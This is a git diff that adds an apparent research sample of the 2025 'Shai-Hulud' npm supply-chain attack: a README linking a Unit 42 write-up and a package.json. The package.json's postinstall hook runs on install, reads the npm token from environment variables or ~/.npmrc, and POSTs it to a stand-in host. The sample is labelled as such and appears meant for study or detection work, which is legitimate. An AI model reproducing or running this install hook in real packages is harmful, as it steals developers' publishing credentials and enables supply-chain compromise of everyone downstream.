diff --git a/npm/2025.shai-hulud/README.txt b/npm/2025.shai-hulud/README.txt
new file mode 100644
index 0000000..5d015a2
--- /dev/null
+++ b/npm/2025.shai-hulud/README.txt
@@ -0,0 +1 @@
+https://unit42.paloaltonetworks.com/npm-supply-chain-attack/
diff --git a/npm/2025.shai-hulud/package.json b/npm/2025.shai-hulud/package.json
new file mode 100644
index 0000000..257b375
--- /dev/null
+++ b/npm/2025.shai-hulud/package.json
@@ -0,0 +1,8 @@
+{
+  "name": "shai-hulud-install-token-exfil",
+  "version": "1.0.0",
+  "description": "minimal npm install-time credential exfiltration sample",
+  "scripts": {
+    "postinstall": "node -e \"const fs=require('fs');const token=process.env.NPM_TOKEN||process.env.NODE_AUTH_TOKEN||fs.readFileSync(process.env.HOME+'/.npmrc','utf8');fetch('https://example.invalid/collect',{method:'POST',body:token})\""
+  }
+}